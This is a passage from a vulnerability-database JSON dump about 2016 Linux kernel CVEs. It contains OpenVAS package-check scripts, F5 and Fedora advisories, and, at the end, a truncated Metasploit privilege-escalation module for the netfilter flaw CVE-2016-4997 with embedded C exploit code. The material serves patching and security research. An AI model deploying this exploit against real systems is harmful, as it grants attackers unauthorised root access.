isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.1.27~24.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~4.1.27~24.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-11T00:00:00", "id": "OPENVAS:1361412562310842798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842798", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3008-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3008-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842798\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-11 05:28:15 +0200 (Sat, 11 Jun 2016)\");\n script_cve_id(\"CVE-2016-1583\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3008-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that eCryptfs improperly attempted to use the mmap()\nhandler of a lower filesystem that did not implement one, causing a\nrecursive page fault to occur. A local unprivileged attacker could use to\ncause a denial of service (system crash) or possibly execute arbitrary code\nwith administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3008-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3008-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1015-snapdragon\", ver:\"4.4.0-1015.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-06-08T00:16:35", "bulletinFamily": "software", "cvelist": ["CVE-2016-4998"], "edition": 1, "description": "\nF5 Product Development has assigned CPF-23377, CPF-23378, and CPF-23379 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable1| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable1| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable1| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable1| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable1| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable1| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable1| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable1| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable1| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable1| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable1| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-03-14T00:54:00", "published": "2017-02-22T20:06:00", "href": "https://support.f5.com/csp/article/K74171196", "id": "F5:K74171196", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-4998", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-09T00:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "description": "\nF5 Product Development has assigned ID 623119 (BIG-IP), ID 623155 (BIG-IQ), and ID 623156 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H624225 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 \n10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.5.4 HF3 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WOM | 11.2.1 | 10.2.1 - 10.2.4 | Medium | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 | Not vulnerable \n\n \n\n| None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.2 | 2.1.0 - 2.3.0 | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "edition": 1, "modified": "2017-10-31T21:08:00", "published": "2016-10-23T07:33:00", "id": "F5:K55672042", "href": "https://support.f5.com/csp/article/K55672042", "title": "Linux kernel vulnerability CVE-2016-4470", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-10-23T05:25:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-4470"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nMitigation\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55672042.html", "id": "SOL55672042", "type": "f5", "title": "SOL55672042 - Linux kernel vulnerability CVE-2016-4470", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-13T22:31:14", "bulletinFamily": "software", "cvelist": ["CVE-2016-1583", "CVE-2016-2143"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:31:00", "published": "2017-03-07T20:55:00", "id": "F5:K10515241", "href": "https://support.f5.com/csp/article/K10515241", "title": "Linux kernel vulnerabilities CVE-2016-1583 and CVE-2016-2143", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-5728"], "description": "The kernel meta package ", "modified": "2016-06-30T21:30:47", "published": "2016-06-30T21:30:47", "id": "FEDORA:F325C6013F0A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.6.3-300.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1237", "CVE-2016-1583", "CVE-2016-4470", "CVE-2016-4998", "CVE-2016-5728", "CVE-2016-5829"], "description": "The kernel meta package ", "modified": "2016-07-02T19:33:02", "published": "2016-07-02T19:33:02", "id": "FEDORA:4F34C605E513", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.5.7-202.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2016-09-26T21:24:11", "description": "This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1\\. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2\\. libc6-dev-i386 (ubuntu), glibc-devel.i686 &amp; libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. We write the ascii files and compile on target instead of locally since metasm bombs for not having cdefs.h (even if locally installed)", "published": "2016-09-25T01:31:00", "type": "metasploit", "title": "CVE-2016-4997 Linux Kernel 4.6.3 Netfilter Privilege Escalation ", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "1970-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/netfilter_priv_esc", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \"msf/core\"\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\n 4.4.0-21-generic.\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n We write the ascii files and compile on target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die <mike@stcyrsecurity.com>', # Module\n 'vnik' # Discovery\n ],\n 'DisclosureDate' => 'Jun 03 2016',\n 'Platform' => [ 'linux'],\n 'Arch' => [ ARCH_X86 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [ 'Ubuntu', { } ]\n #[ 'Fedora', { } ]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n [ 'EDB', '40049'],\n [ 'CVE', '2016-4997'],\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\n ]\n ))\n register_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ], self.class)\n end\n\n def check\n def iptables_loaded?()\n # user@ubuntu:~$ cat /proc/modules | grep ip_tables\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\n vprint_status('Checking if ip_tables is loaded in kernel')\n if target.name == \"Ubuntu\"\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\n if iptables.include?('ip_tables')\n vprint_good('ip_tables.ko is loaded')\n else\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('ip_tables')\n elsif target.name == \"Fedora\"\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\n if iptables.include?('iptable_raw')\n vprint_good('iptable_raw is loaded')\n else\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('iptable_raw')\n else\n return false\n end\n end\n\n def shemsham_installed?()\n # we want this to be false.\n vprint_status('Checking if shem or sham are installed')\n shemsham = cmd_exec('cat /proc/cpuinfo')\n if shemsham.include?('shem')\n print_error('shem installed, system not vulnerable.')\n elsif shemsham.include?('sham')\n print_error('sham installed, system not vulnerable.')\n else\n vprint_good('shem and sham not present.')\n end\n return (shemsham.include?('shem') or shemsham.include?('sham'))\n end\n\n if iptables_loaded?() and not shemsham_installed?()\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\n if target.name == \"Ubuntu\"\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\n if lib.include?('install')\n vprint_good('libc6-dev-i386 is installed')\n else\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\n end\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\n if multilib.include?('install')\n vprint_good('gcc-multilib is installed')\n else\n print_error('gcc-multilib is not installed. Compiling will fail.')\n end\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. Compiling will fail.')\n end\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\n elsif target.name == \"Fedora\"\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\n if lib.include?('glibc')\n vprint_good('glibc-devel.i686 is installed')\n else\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\n end\n if lib.include?('libgcc')\n vprint_good('libgcc.i686 is installed')\n else\n print_error('libgcc.i686 is not installed. Compiling will fail.')\n end\n multilib = false #not implemented\n gcc = false #not implemented\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\n else\n return false\n end\n end\n\n compile = false\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\n end\n\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_file = rand_text_alpha(8)\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\n\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\n # removed #include <netinet/in.h> per busterb comment in PR 7326\n decr = %q{\n #define _GNU_SOURCE\n #include <stdio.h>\n #include <stdlib.h>\n #include <string.h>\n #include <unistd.h>\n #include <sched.h>\n #include <netinet/in.h>\n #include <linux/sched.h>\n #include <errno.h>\n #include <sys/types.h>\n #include <sys/socket.h>\n #include <sys/ptrace.h>\n #include <net/if.h>\n #include <linux/netfilter_ipv4/ip_tables.h>\n #include <linux/netlink.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n\n #define MALLOC_SIZE 66*1024\n\n int decr(void *p) {\n int sock, optlen;\n int ret;\n void *data;\n struct ipt_replace *repl;\n struct ipt_entry *entry;\n struct xt_entry_match *ematch;\n struct 